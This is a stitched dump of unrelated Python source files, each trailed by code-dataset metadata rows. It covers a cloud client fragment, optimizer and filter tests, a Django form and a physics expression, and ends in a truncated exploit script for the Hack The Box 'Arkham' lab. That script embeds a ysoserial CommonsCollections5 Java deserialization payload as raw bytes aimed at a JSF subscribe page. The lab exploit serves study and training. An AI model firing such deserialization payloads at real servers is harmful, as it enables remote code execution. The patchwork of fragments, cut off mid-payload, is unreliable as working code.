def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
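# A minimal usage sketch for the context-manager protocol above (an
# illustration added here, assuming the transport is dedicated to this
# client and not shared, per the warning in ``__exit__``):
#
#     with certificate_manager_v1.CertificateManagerClient() as client:
#         client.get_dns_authorization(name="name_value")
#     # The transport is closed here; the client must not be reused.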
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-certificate-manager",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("CertificateManagerClient",)
| 40.318381 | 201 | 0.612076 | 12,444 | 119,544 | 5.754581 | 0.047252 | 0.058065 | 0.030722 | 0.019034 | 0.825485 | 0.783131 | 0.760229 | 0.729898 | 0.712805 | 0.696202 | 0 | 0.002496 | 0.319615 | 119,544 | 2,964 | 202 | 40.331984 | 0.877926 | 0.5218 | 0 | 0.590426 | 0 | 0.001773 | 0.087241 | 0.038038 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045213 | false | 0 | 0.022163 | 0.000887 | 0.119681 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c63f467ca82f24de98cbce5a2d075823494f5500 | 49 | py | Python | azure_blob_utils/__init__.py | YuRiTan/azure-blob-utils | e20bbaee46e320948da3b8c0be4ed21a93182ca1 | ["MIT"] | 1 | 2020-09-22T10:06:09.000Z | 2020-09-22T10:06:09.000Z | azure_blob_utils/__init__.py | YuRiTan/azure-blob-utils | e20bbaee46e320948da3b8c0be4ed21a93182ca1 | ["MIT"] | null | null | null | azure_blob_utils/__init__.py | YuRiTan/azure-blob-utils | e20bbaee46e320948da3b8c0be4ed21a93182ca1 | ["MIT"] | null | null | null |
from .connector import AzureBlobStorageConnector
| 24.5 | 48 | 0.897959 | 4 | 49 | 11 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081633 | 49 | 1 | 49 | 49 | 0.977778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d6cb183158737cb2ecd7e562b60c8a06cfcc77c0 | 126 | py | Python | chapter-5/basic_hook/hook_it.py | Carl-Ty/Modular-Programming-with-Python | efe1c725602b2148fdeb530e89381895c3e7f696 | ["MIT"] | null | null | null | chapter-5/basic_hook/hook_it.py | Carl-Ty/Modular-Programming-with-Python | efe1c725602b2148fdeb530e89381895c3e7f696 | ["MIT"] | null | null | null | chapter-5/basic_hook/hook_it.py | Carl-Ty/Modular-Programming-with-Python | efe1c725602b2148fdeb530e89381895c3e7f696 | ["MIT"] | null | null | null |
import get_hooked
def hooked_print():
print(f"{hooked_print.__name__} got hooked")
get_hooked.set_hook(hooked_print)
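# ``get_hooked`` is a companion module in the book's repository and is not
# shown here. A hypothetical minimal interface that would satisfy this
# example (an assumption for illustration, not the book's actual code):
#
#     # get_hooked.py
#     _hook = None
#
#     def set_hook(func):
#         """Remember *func* so the framework can call it later."""
#         global _hook
#         _hook = func
#
#     def fire_hook():
#         if _hook is not None:
#             _hook()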
| 12.6 | 48 | 0.761905 | 19 | 126 | 4.526316 | 0.526316 | 0.383721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134921 | 126 | 9 | 49 | 14 | 0.788991 | 0 | 0 | 0 | 0 | 0 | 0.272 | 0.184 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0.75 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
d6df3638f9df97c6b106c9660ede84caefe12276 | 65 | py | Python | yad2/__init__.py | odcinek/yad2 | 5ecf5073a7eb9651944837e33c083c4a1e7945bc | ["MIT"] | null | null | null | yad2/__init__.py | odcinek/yad2 | 5ecf5073a7eb9651944837e33c083c4a1e7945bc | ["MIT"] | null | null | null | yad2/__init__.py | odcinek/yad2 | 5ecf5073a7eb9651944837e33c083c4a1e7945bc | ["MIT"] | 1 | 2021-10-17T15:46:50.000Z | 2021-10-17T15:46:50.000Z |
from .utils import *
from .formats import *
from .encoders import *
| 16.25 | 22 | 0.769231 | 9 | 65 | 5.555556 | 0.555556 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184615 | 65 | 3 | 23 | 21.666667 | 0.943396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ba4f9807b0a73bbadade768579cfd6dfb7f0806a | 7,453 | py | Python | src/secml/optim/optimizers/tests/test_c_optimizer_pgd_ls_discrete.py | zangobot/secml | 95a293e1201c24256eb7fe2f1d2125cd5f318c8c | ["Apache-2.0"] | 63 | 2020-04-20T16:31:16.000Z | 2022-03-29T01:05:35.000Z | src/secml/optim/optimizers/tests/test_c_optimizer_pgd_ls_discrete.py | zangobot/secml | 95a293e1201c24256eb7fe2f1d2125cd5f318c8c | ["Apache-2.0"] | 5 | 2020-04-21T11:31:39.000Z | 2022-03-24T13:42:56.000Z | src/secml/optim/optimizers/tests/test_c_optimizer_pgd_ls_discrete.py | zangobot/secml | 95a293e1201c24256eb7fe2f1d2125cd5f318c8c | ["Apache-2.0"] | 8 | 2020-04-21T09:16:42.000Z | 2022-02-23T16:28:43.000Z |
from secml.optim.optimizers.tests import COptimizerTestCases
from secml.array import CArray
from secml.optim.optimizers import COptimizerPGDLS
from secml.optim.constraints import CConstraintBox, CConstraintL1
class TestCOptimizerPGDLSDiscrete(COptimizerTestCases):
"""Unittests for COptimizerPGDLS in discrete space."""
def test_minimize_3h_camel(self):
"""Test for COptimizer.minimize() method on 3h-camel fun.
This function tests the optimization in discrete space,
with an integer eta and an integer starting point.
The solution expected by this test is an integer vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-1, ub=1)
}
self._test_minimize(COptimizerPGDLS, '3h-camel',
opt_params=opt_params,
label='discrete',
out_int=True)
def test_minimize_3h_camel_l1(self):
"""Test for COptimizer.minimize() method on 3h-camel fun.
This function tests the optimization in discrete space,
with a floating eta (l1 constraint) and an integer starting point.
The solution expected by this test is a float vector.
"""
opt_params = {
'eta': 0.5, 'eta_min': 0.5, 'eps': 1e-12,
'constr': CConstraintL1(radius=2),
'bounds': CConstraintBox(lb=-1, ub=1)
}
self._test_minimize(COptimizerPGDLS, '3h-camel',
opt_params=opt_params,
label='discrete-l1')
def test_minimize_beale(self):
"""Test for COptimizer.minimize() method on 3h-camel fun.
This function tests the optimization in discrete space,
with a floating eta (l1 constraint) and an integer starting point.
The solution expected by this test is a float vector.
"""
opt_params = {
'eta': 1e-6, 'eta_min': 1e-4, 'eps': 1e-12,
'constr': CConstraintL1(center=CArray([2, 0]), radius=2),
'bounds': CConstraintBox(lb=0, ub=4)
}
self._test_minimize(COptimizerPGDLS, 'beale',
opt_params=opt_params,
label='discrete-l1')
def test_minimize_quad2d_no_bound(self):
"""Test for COptimizer.minimize() method on a quadratic function in
a 2-dimensional space.
This function tests the optimization in discrete space,
with an integer eta, an integer starting point and without any bound.
The solution expected by this test is an integer vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12
}
# both the starting point and eta are integer,
# therefore we expect an integer solution
self._test_minimize(COptimizerPGDLS, 'quad-2',
opt_params=opt_params,
label='quad-2-discrete',
out_int=True)
def test_minimize_quad2d_bound(self):
"""Test for COptimizer.minimize() method on a quadratic function in
a 2-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer starting point and with a box constraint.
The solution expected by this test is an integer vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-2, ub=3)
}
self._test_minimize(
COptimizerPGDLS, 'quad-2',
opt_params=opt_params,
label='quad-2-discrete-bounded',
out_int=True)
def test_minimize_quad100d_sparse(self):
"""Test for COptimizer.minimize() method on a quadratic function in
a 100-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer and sparse starting point with box constraint.
The solution expected by this test is an integer sparse vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-2, ub=3)
}
self._test_minimize(
COptimizerPGDLS, 'quad-100-sparse',
opt_params=opt_params,
label='quad-100-sparse-discrete-bounded',
out_int=True)
def test_minimize_quad100d_l1_sparse(self):
"""Test for COptimizer.minimize() method on a quadratic function in
a 100-dimensional space.
This function tests the optimization in discrete space, with an
integer eta (l1 constraint), an integer sparse starting point
with box constraint.
The solution expected by this test is an integer sparse vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'constr': CConstraintL1(radius=100),
'bounds': CConstraintBox(lb=-2, ub=3)
}
self._test_minimize(
COptimizerPGDLS, 'quad-100-sparse',
opt_params=opt_params,
label='quad-100-sparse-discrete-bounded-l1',
out_int=True)
def test_minimize_poly_2d_bounded(self):
"""Test for COptimizer.minimize() method on a polynomial function in
a 2-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer starting point with a box constraint.
The solution expected by this test is an integer vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-1, ub=1)}
self._test_minimize(
COptimizerPGDLS, 'poly-2',
opt_params=opt_params,
label='poly-discrete-bounded',
out_int=True
)
def test_minimize_poly_100d_bounded(self):
"""Test for COptimizer.minimize() method on a polynomial function in
a 100-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer starting point with a box constraint.
The solution of this problem is an integer vector (of zeros).
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-1, ub=1)
}
self._test_minimize(
COptimizerPGDLS, 'poly-100-int',
opt_params=opt_params,
label='poly-int-discrete-bounded',
out_int=True)
def test_minimize_poly_100d_bounded_sparse(self):
"""Test for COptimizer.minimize() method on a polynomial function in
a 100-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer and sparse starting point (zeros vector)
with a box constraint.
The solution expected by this test is an integer sparse vector (of zeros).
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-1, ub=1)
}
self._test_minimize(
COptimizerPGDLS, 'poly-100-int-sparse',
opt_params=opt_params,
label='poly-int-sparse-discrete-bounded',
out_int=True)
if __name__ == '__main__':
COptimizerTestCases.main()
| 39.020942 | 82 | 0.600429 | 900 | 7,453 | 4.847778 | 0.114444 | 0.061884 | 0.037818 | 0.048132 | 0.872565 | 0.853083 | 0.82512 | 0.793262 | 0.793262 | 0.775155 | 0 | 0.028988 | 0.310345 | 7,453 | 190 | 83 | 39.226316 | 0.819844 | 0.378371 | 0 | 0.514563 | 0 | 0 | 0.125299 | 0.040249 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097087 | false | 0 | 0.038835 | 0 | 0.145631 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba6aa50f4379bf18bbf169b72be331ac588bd7fd | 236 | py | Python | accounts/forms.py | cgu-ist/ist3032019spring-project1 | c4ee97e8a0766aee2fd6654c11b2b6759293e42e | ["MIT"] | null | null | null | accounts/forms.py | cgu-ist/ist3032019spring-project1 | c4ee97e8a0766aee2fd6654c11b2b6759293e42e | ["MIT"] | 1 | 2021-03-19T22:49:44.000Z | 2021-03-19T22:49:44.000Z | accounts/forms.py | cgu-ist/ist3032019spring-project1 | c4ee97e8a0766aee2fd6654c11b2b6759293e42e | ["MIT"] | null | null | null |
from django import forms
class LoginForm(forms.Form):
username = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'form-control'}))
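# A minimal usage sketch (hypothetical view-side code, not part of this
# module): binding data to the form and validating it. The widget ``attrs``
# make each rendered <input> carry Bootstrap's ``form-control`` CSS class.
#
#     form = LoginForm(data={'username': 'alice', 'password': 's3cret'})
#     if form.is_valid():
#         username = form.cleaned_data['username']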
| 33.714286 | 91 | 0.737288 | 28 | 236 | 6.214286 | 0.535714 | 0.16092 | 0.229885 | 0.287356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 236 | 6 | 92 | 39.333333 | 0.820755 | 0 | 0 | 0 | 0 | 0 | 0.144068 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.25 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
240f9ea4ef8f740bd50af7dc369608a9c9955aee | 2,281 | py | Python | tests/test_filters_dct2d.py | wavestoweather/enstools | d0f612b0187b0ad54dfbbb78aa678564f46eaedf | ["Apache-2.0"] | 5 | 2021-12-16T14:08:00.000Z | 2022-03-02T14:08:10.000Z | tests/test_filters_dct2d.py | wavestoweather/enstools | d0f612b0187b0ad54dfbbb78aa678564f46eaedf | ["Apache-2.0"] | null | null | null | tests/test_filters_dct2d.py | wavestoweather/enstools | d0f612b0187b0ad54dfbbb78aa678564f46eaedf | ["Apache-2.0"] | null | null | null |
from enstools.misc import generate_coordinates
from enstools.filters import dct_2d_regional
import xarray as xr
import numpy as np
import pytest
@pytest.fixture
def low_freq_data():
"""
generate low frequency test data.
"""
lon, lat = generate_coordinates(0.5, lon_range=[-20, 20], lat_range=[-10, 10])
low_freq, _ = np.meshgrid(
np.sin(np.linspace(-1 * np.pi, 1 * np.pi, len(lon))),
np.zeros(40)
)
data = xr.DataArray(low_freq, coords=[lat, lon], dims=('lat', 'lon'), name="Test")
return data
@pytest.fixture
def high_freq_data():
"""
generate high frequency test data.
"""
lon, lat = generate_coordinates(0.5, lon_range=[-20, 20], lat_range=[-10, 10])
high_freq, _ = np.meshgrid(
np.sin(np.linspace(-10 * np.pi, 10 * np.pi, len(lon))),
np.zeros(40)
)
data = xr.DataArray(high_freq, coords=[lat, lon], dims=('lat', 'lon'), name="Test")
return data
def test_filters_dct2d_regional_low_pass(high_freq_data, low_freq_data):
"""
filter out the high frequency wave
"""
# don't look at the edges. small deviations are expected.
# high frequencies should be reduced
filtered_low = dct_2d_regional(high_freq_data, high_freq_data['lon'], high_freq_data['lat'], low_cutoff=2000)
np.testing.assert_array_less(filtered_low[:, 2:-2], 0.2)
# low frequencies should not be changed significantly
filtered_low = dct_2d_regional(low_freq_data, low_freq_data['lon'], low_freq_data['lat'], low_cutoff=2000)
np.testing.assert_array_less(np.abs(filtered_low - low_freq_data)[:, 2:-2], 0.2)
def test_filters_dct2d_regional_high_pass(high_freq_data, low_freq_data):
"""
filter out the low frequency wave
"""
# don't look at the edges. small deviations are expected.
# low frequencies should be reduced
filtered_high = dct_2d_regional(low_freq_data, low_freq_data['lon'], low_freq_data['lat'], high_cutoff=2000)
np.testing.assert_array_less(filtered_high[:, 2:-2], 0.2)
# high frequencies should not be changed significantly
filtered_high = dct_2d_regional(high_freq_data, high_freq_data['lon'], high_freq_data['lat'], high_cutoff=2000)
np.testing.assert_array_less(np.abs(filtered_high - high_freq_data)[:, 2:-2], 0.2)
| 36.790323 | 115 | 0.694871 | 353 | 2,281 | 4.226629 | 0.212465 | 0.107239 | 0.073727 | 0.040214 | 0.835121 | 0.743968 | 0.727882 | 0.621984 | 0.61126 | 0.61126 | 0 | 0.036605 | 0.173608 | 2,281 | 61 | 116 | 37.393443 | 0.754907 | 0.185445 | 0 | 0.242424 | 1 | 0 | 0.024554 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 1 | 0.121212 | false | 0.060606 | 0.151515 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
241471c56dd30670fdd2c6fe1062b334ba0445f7 | 44 | py | Python | bokchoy/conductors/dummy/__init__.py | ulule/bokchoy | 58afaf325ce275edf5c4a955379afb1cc5eb5de3 | ["MIT"] | null | null | null | bokchoy/conductors/dummy/__init__.py | ulule/bokchoy | 58afaf325ce275edf5c4a955379afb1cc5eb5de3 | ["MIT"] | null | null | null | bokchoy/conductors/dummy/__init__.py | ulule/bokchoy | 58afaf325ce275edf5c4a955379afb1cc5eb5de3 | ["MIT"] | null | null | null |
from .backend import DummyConductor # noqa
| 22 | 43 | 0.795455 | 5 | 44 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159091 | 44 | 1 | 44 | 44 | 0.945946 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
241a0dec6a26cd821fec2afd99516530823e121c | 36 | py | Python | petra_viewer/convertor/__init__.py | yamedvedya/data_viewer | c6238b71edcf0178ebe8ab8f9bf6e56e41cd4916 | ["MIT"] | null | null | null | petra_viewer/convertor/__init__.py | yamedvedya/data_viewer | c6238b71edcf0178ebe8ab8f9bf6e56e41cd4916 | ["MIT"] | null | null | null | petra_viewer/convertor/__init__.py | yamedvedya/data_viewer | c6238b71edcf0178ebe8ab8f9bf6e56e41cd4916 | ["MIT"] | null | null | null |
# Created by matveyev at 29.04.2021
| 18 | 35 | 0.75 | 7 | 36 | 3.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.266667 | 0.166667 | 36 | 1 | 36 | 36 | 0.633333 | 0.916667 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2450909c3ca27bb6a7c97ae2ec07ef3a0b43c3e9 | 117 | py | Python | Waveforms/results/JijklCMS.py | keefemitman/PostNewtonian | 853d6577cb0002da5eebe1cb55f0c28fbc114324 | ["MIT"] | 18 | 2015-03-26T01:04:36.000Z | 2022-02-01T19:26:21.000Z | Waveforms/results/JijklCMS.py | keefemitman/PostNewtonian | 853d6577cb0002da5eebe1cb55f0c28fbc114324 | ["MIT"] | 4 | 2015-01-08T23:46:29.000Z | 2017-09-20T19:13:51.000Z | Waveforms/results/JijklCMS.py | keefemitman/PostNewtonian | 853d6577cb0002da5eebe1cb55f0c28fbc114324 | ["MIT"] | 3 | 2016-05-13T02:36:14.000Z | 2021-11-23T21:36:32.000Z |
( ( ( nu*(15*nu/2 - 5/2)*r(t)**3/c )*nHat*nHat*nHat*SigmaVec )
+( ( -5*delta*nu*r(t)**3/(2*c) )*nHat*nHat*nHat*S ) )
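# The expression above is a fragment from a larger symbolic framework; nu,
# delta, c, nHat, SigmaVec, S and r(t) are defined elsewhere in the
# repository. A sketch that makes it parse with sympy, under the simplifying
# assumption (not how the original code models them) that the vector
# factors commute like scalars:
#
#     import sympy
#     t, nu, delta, c, nHat, SigmaVec, S = sympy.symbols(
#         't nu delta c nHat SigmaVec S')
#     r = sympy.Function('r')
#     expr = ((nu*(15*nu/2 - sympy.Rational(5, 2))*r(t)**3/c)
#             * nHat*nHat*nHat*SigmaVec
#             + (-5*delta*nu*r(t)**3/(2*c))*nHat*nHat*nHat*S)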
| 58.5 | 62 | 0.504274 | 26 | 117 | 2.269231 | 0.461538 | 0.542373 | 0.101695 | 0.440678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087379 | 0.119658 | 117 | 2 | 63 | 58.5 | 0.485437 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
301bf3a4e93afb65d25cd333eed70e768dbca517 | 29 | py | Python | accounts/models/__init__.py | UserGraund/main_application | a814daf816858c94035191e01adae0a6b4d0bb42 | ["MIT"] | 3 | 2020-02-16T10:49:01.000Z | 2021-09-22T19:16:27.000Z | facebookHandler/__init__.py | ahmed-tounsi/facebook-handler | e00f656775920fc9c082532c789318f3740c9607 | ["MIT"] | null | null | null | facebookHandler/__init__.py | ahmed-tounsi/facebook-handler | e00f656775920fc9c082532c789318f3740c9607 | ["MIT"] | 1 | 2021-02-16T19:27:14.000Z | 2021-02-16T19:27:14.000Z |
from .account import Account
| 14.5 | 28 | 0.827586 | 4 | 29 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
30373fa6206bc869e7a9d68f87e6aafda378bf46 | 10,803 | py | Python | Machines/Arkham/exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | ["CNRI-Python"] | null | null | null | Machines/Arkham/exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | ["CNRI-Python"] | null | null | null | Machines/Arkham/exploit.py | uwacsp/IppSec-Code | 29a1ea6a93bc01b3700373d48caa5a79a3916a73 | ["CNRI-Python"] | 1 | 2021-07-27T12:56:03.000Z | 2021-07-27T12:56:03.000Z |
#
# From Ippsec YouTube video of HTB Arkham
#
# https://youtu.be/krC5j1Ab44I
#
from base64 import b64decode, b64encode
from hashlib import sha1
import pyDes, hmac
import requests
from cmd import Cmd
URL = "http://10.10.10.130:8080/userSubscribe.faces"
# Adding Cmd to get terminal functionality
class Terminal(Cmd):
def __init__(self):
self.prompt = '> '
Cmd.__init__(self)
def default(self, args):
exploit(args)
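# Cmd subclasses such as Terminal are typically started via the standard
# library's read-eval loop, e.g.:
#
#     Terminal().cmdloop()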
def create_payload(cmd):
# payload from ysoserial https://github.com/frohoff/ysoserial
# java -jar /opt/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 'cmd /c ping -n 1 10.10.14.27' > payload.bin
payload = b""
payload += b'\xac\xed\x00\x05\x73\x72\x00\x2e\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x42\x61\x64\x41\x74'
payload += b'\x74\x72\x69\x62\x75\x74\x65\x56\x61\x6c\x75\x65\x45\x78\x70\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd4\xe7\xda\xab\x63\x2d'
payload += b'\x46\x40\x02\x00\x01\x4c\x00\x03\x76\x61\x6c\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63'
payload += b'\x74\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a'
payload += b'\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5'
payload += b'\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e'
payload += b'\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x74\x00'
payload += b'\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61'
payload += b'\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65'
payload += b'\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00'
payload += b'\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x08\x70\x75\x72\x00\x1e\x5b'
payload += b'\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02'
payload += b'\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x03\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e'
payload += b'\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x08\x42\x00'
payload += b'\x06\x66\x6f\x72\x6d\x61\x74\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0f\x63\x6c\x61\x73\x73\x4c\x6f'
payload += b'\x61\x64\x65\x72\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73'
payload += b'\x71\x00\x7e\x00\x05\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64'
payload += b'\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x6d\x6f\x64\x75\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x05\x4c\x00\x0d'
payload += b'\x6d\x6f\x64\x75\x6c\x65\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x01\x00\x00\x00\x51\x74\x00\x03\x61\x70'
payload += b'\x70\x74\x00\x26\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2e\x70\x61\x79\x6c\x6f\x61\x64\x73\x2e\x43\x6f\x6d\x6d\x6f\x6e\x73'
